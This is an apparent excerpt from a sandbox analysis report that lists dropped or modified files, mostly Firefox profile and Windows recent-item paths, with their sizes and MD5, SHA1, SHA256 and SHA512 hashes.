MD58df98cd49957ab3fbe893ceeabf36571
SHA14c97d1c3d298b22302e928cf168e0ba063dba30e
SHA25674650a1ba00f477e25bf7fdabb2aed46c8d27bdc2cedc7efe4fb006dff9f1011
SHA512a754833e1ab22f32665cfc84e76030c3d1d969b9f6e0cf3d7b6085e533ca20c889906dd9f49bc136c0096bcab73ea164810398d6d168661791ec8b4127a1374f
-
Filesize
21KB
MD51fdf745531ab579bf90f05597e46fe8f
SHA1c824ed9b98a4300723211a42d107a0b4c2af1c5e
SHA256b84dac9ef501227ca3d69cf293bc3e2b2a5a78c188c879464bcd96e84d2d1200
SHA5122d3d3bebd374eb487fb771e5272384c3832f36737e8f5207fb1cb987f2788e580b77e84f67eda3c199f4ac09e2859b4d82ce6f3538616bfc956c0a7dc9ab8e3c
-
Filesize
18KB
MD5a6cb53181eaf6a0338b8127302ab09a8
SHA14db2fa1b697c7f4e61f614546a7ab1b1d17d0e4b
SHA25662f696de751689bdc876c77743025b4c332a8982e0c740be03aeae62059bb6ff
SHA512f033201125856d05af4f496d263e77b15d184e798929ee7254cfc2d8d0d073901c90e280f45294699a4736dbc7528551fb993d512e5495cdf840f48341bdff8c
-
Filesize
17KB
MD5f20d3da550a949d2fc7b09be1b4cc2c1
SHA1b2498dba20a767951ff6a3589a29a5deac595ffe
SHA256e84a81696333d6ee30536583717c202b71a1b951bff815e9b1a38b4d352aa38c
SHA512e1b38a47e0363c1116d41a0d91a66619cf17aed01a93978f99cd4d2e25089e29ba431e8e056bc151634bd007047a3773c492744021dd1fa55ff08e7d6ed22b99
-
Filesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
Filesize
92KB
MD56d9ead954a1d55a4b7b9a23d96bb545e
SHA1b55a31428681654b9bc4f428fc4c07fa7244760f
SHA256eab705a4e697fa8c54cdbe7df8d46c679df9878c327a003819bb2bf72d90919c
SHA512b9422f770aa156c13f63399aae96d750f273a6db7c9177b725660aa236a04ca7c4e3bf64d394de3a1f1ec2ad49b60528023aee37b7c195ed70073c049980a322
-
Filesize
726B
MD592155acd7614815305b9d2ae49e15b67
SHA1f2daad46e9932e5517c15be4c4218e707734f54e
SHA2565ceec8e73729d494b9182329be057aed1a8605339e666845c7f979792b5cd184
SHA512ec1d19b6d87e14fc4275a2d45336d513cfdf2142c786d57e9a7b88f8fcda625a2e1bf781dc89376daf4e1edeeefc56308cee9569d859597bc1479d2e8a73309b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD581db856d125262744be54b5f2d01d87c
SHA159ea8142d258ac820a16637937850928e3e602ec
SHA256814cc7a5b9ac41be8b6d7f08e30a96bb8c6dde6ee4dc369fdfe2c72aa96a788c
SHA5127785b890a457847eb4c6e7ef7e67589321fb7d855d23b4c48a4c272a934e5d3d274e065f32501a25567a59c7ff4f0c2b063bcfaae895a96b16133a69f960d421
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5c216d76313809d7b4a82e53cb07e89fc
SHA16ddffa24b91663a7c07dfa62b476ba37704f45dc
SHA256c499272002f810e6e8eccd1fd8a1b199fdb970c69622e77d56b47e52e616dd83
SHA5125a02227343f5d8739658acdda6bc2b12c0926607fa8bc0d26558d922f92fed28d92f56176629433930ba6f0579f2623341d67742472dc32b618984e28dc31122
-
Filesize
96KB
MD5da8eb8ee23cc7f08edb5ce8e9f60febb
SHA1a28598de00acc1b102a7ba509031c9899f8beb86
SHA2562cb01a89f3fb9da2462661fa1da9acabdf566ce09e96ea62183a6916be2f108b
SHA51257f4f696caafa36ccda27a31026d208db8a32724c808ca9d80dd7eb6b9187cdc9ce8a4a7cc9b02a3f0e4efe531b0a4adf0e0553543c2fe411bcc80871a034f74
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\db\data.safe.bin
Filesize4KB
MD5ec7ff7cddbbac25f054c196411b06944
SHA122390bcf1a4b61d4d1bf7b92bb300d860ea638b3
SHA256f7fefb7e20bcfae15eb8a677fc14a382042d0058864060c0d7cda469f887afc7
SHA51218a5d73c85199230e60e9aaed16eef197e1a25591d86186415798b56b7f5dd77d2a33ad0dcaf7fff31529db78af36e162086ae71a1938037cf2895f827c4ebaf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD522c74623a88cc77e355abf903524f982
SHA1a40dd9eb5d1647456271a1245c36581a949c7185
SHA256da8733bd6a9b99b036a9b42b1bc44c733f6db6190125b40f80bfd4260f2c3cf3
SHA51274ef079ff23435163b2d39a64aca43245c861946815c5188192af43415164c4dc87b338fe6056e0b82de9d4d65e79a007021188ab764e6158b974dc4b9c9ffdf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\pending_pings\0bc99191-1461-445a-947c-ac1f4a3565a0
Filesize745B
MD5bfb3e76411de3f5368798afab92a4f41
SHA1e4060bde8a4c9a5b54b6c1fefc6a2da7434b1995
SHA256ab68312a2e0c18a7ae3b70a1ce4eb432f17b37d0757f85c9a1c17f3c5c600ce3
SHA5126552d90dba24fe4ceea514477c3e480377c18bc7bc2c979d719b9b9383cb41b65f1460347ddcb3f235c82f8248884e3b559fc7e0f7e585dc958741d6c9250d73
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\pending_pings\452c554d-1111-4b1d-bb75-72393ee2418f
Filesize13KB
MD5c91f38130024f181217db2adf0473480
SHA122ae3c883d7fd3bccee9ec34754262eccdbe7569
SHA256c04349c0fb8380cd6c9838cebee60e70d2eab972fdbd4bd4b9048ba575c7fdaf
SHA512a871a28865f334544ece3a38be5ee25dd1d5af1bef6939a97d4dfbc3be51ff5c412e99f5a6434997475fdf18e6b05a70bc41bbeb607aed72a8e4152936dcd4b1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\pending_pings\74049f49-9485-4dae-bdf4-951deeb41ee9
Filesize796B
MD53fb9f23642217dc6aa617c3022b09e09
SHA115b63ea73c5fdf0fe46a50bcf4636bb64c875676
SHA2560307e480341a0641a905610ddd5bcd06a879e36e1f7c1621b0786485d6adac55
SHA5129f45d3d84f6466f660529423ccce57140a81eb34ec3bc955e9b3ec442622253fdfb48c1f74307bce98ae036dcd0024d796ffc289e7087b1a7d7a75976e1bc68e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\pending_pings\76dfeaa9-6750-445b-a863-8fa39fa66716
Filesize769B
MD5296c13aab4a6939aac6d24a85700a12a
SHA19b258cb5c6899d261a9eb73ac1e513f92a758bcd
SHA256618b0d6a24b795d73113130256747339746d7db582fbdb73dd9e035f6721ce6a
SHA512bcbc007a9938a8ad19461e4a35eda0fbf2a6e8d0802e2fe95fcb4547ae4b8e5440ac8bcb3e684ffea82f32fecea95e787c4d596fea9aabd73562f4b92ebb9d47
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\datareporting\glean\pending_pings\ed652d27-769d-4ceb-85ec-474ef8932b4d
Filesize656B
MD59b76108b612f2870785ad569a34ff747
SHA1ca607a067af1f72834e9b899b6ebafdcc22a63b9
SHA256383bf8d7ec712faf303e7094a70fe75569fc66c5517bf884b6f801c0608ef96a
SHA512687f37015c8e833e43001a3207a346a423d878c8863cdc90fa2ece9c38f398f30973429b49fce170e72fa1d1fc0b4437f391e6b82069bebeec5b6550e749a218
-
Filesize
6KB
MD56544d02f0ff8ff227cd00a97ad2ca272
SHA17127fe5b15f8775e5cd2c9761f98946a49d5cfad
SHA256a011a65941fb22aa7cff5508d9910fe6708224f7466228fee8f8448884a8a4ca
SHA512f06a5051afb868758676a4c75f37eee16b6b9aece7bd2f999130e02c922d0ad601fe6dc10e1dec31f023cc9a4dd177e73f5c32217e57bc60ef36a4982a633187
-
Filesize
6KB
MD54ef471d7ad54cf8697cbf584e0a9f7db
SHA16dd483989b9b801c85a1952a8c05f11ec5d7c0f0
SHA256c6c91f7a4d281dc83dcbb768a312af7a61febb3eae310fe478baf0e4dcf9c3d7
SHA512eb88baf3561fdcb056a03f33d4fe5d8b95aeaf56e7486ee5e62e14b5b65a54aea7b4d1113afd65805b744a95bb016067fa94822fef7ce98126e483a1a855b700
-
Filesize
6KB
MD537014f8789e153380a12471bbe679428
SHA1207546566efce1f93bb437b0f7a6226aabb59a74
SHA25678d097168401116a8099fffb02448ec864ae8e4e73136768050032e336ecfda3
SHA512ef7520e17eef1910100cade588523b7339791cd58038c4db3d5e8a81c94f9202f6f585e1577848a891bbcdc7ff12997777a16262d736e7b5d408a6a242096e10
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\sessionCheckpoints.json.tmp
Filesize53B
MD5ea8b62857dfdbd3d0be7d7e4a954ec9a
SHA1b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a
SHA256792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da
SHA512076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\sessionCheckpoints.json.tmp
Filesize90B
MD5c4ab2ee59ca41b6d6a6ea911f35bdc00
SHA15942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA25600ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA51271ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\sessionstore-backups\recovery.jsonlz4
Filesize1KB
MD5929bafcf1c71556e7294dd80567dd9aa
SHA1f7c84a40492b4bca1b82207fffdf2c8975d7f1f2
SHA2568c146ad84766af57e7cd36b0234bd6612e23d2832106e533fab04c433d80a3fd
SHA512843692ce4efb2aedafe8ecd60594a3be65a4dbc6d3ed8007ad036e7d2c90756c6509b51cb9b88527ae6afe24801cdbcd63806e62120fccd2846d8bfd12ba4661
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD502746dc3a5b7c6c9b0473a7c15677318
SHA1fa8adba5260c462b96a6e5b9025b4bfd98958951
SHA25611858c1517884b4a1682466857c9fe14ada0ff122bca2a3295da945e8a5abee6
SHA512dc3730a75aefbf68ed6f841ddd9a236622eb9b82ef13e88f5dc5e7b64a69d5812437f3d8632d750309bdfe6c16e722707ea47105449a16a7c64a0922ff10f73f
-
Filesize
1.7MB
MD5bbc90cf12b409440faff9045fd9bd751
SHA1a05e8ca12b3309b21c7fa5f5c0351ee07293ee9b
SHA2566714fc7ec330f047980050bcbce844567d3854a6b307d17bfe3f1011a2d670cc
SHA512bc15f92708b35bc70e8cecafc233aed5b6b1ce80a19a538ad1aaf0c2e3edd021a3b389d75695658a785a81f02d291be02a21c62cfcea85c7bc581aa5b25f1b1d
-
Filesize
2.0MB
MD51ee62a8582a9bc40f3f5a3689367d7af
SHA11102b42943d2a5d3f4e51469a5c713d641c41b76
SHA256c35333079ec8635c9f37069897bfd9f27a48794c8ee57b03f0a2ea920b73d043
SHA51203557864a197856d8a1be2990b73c8c598bdac1ac31957f7384bc329fcfe2afbe206b14467e0ff33cb352720c6e265a9d73688260f49345b46a9f1ae24af9d23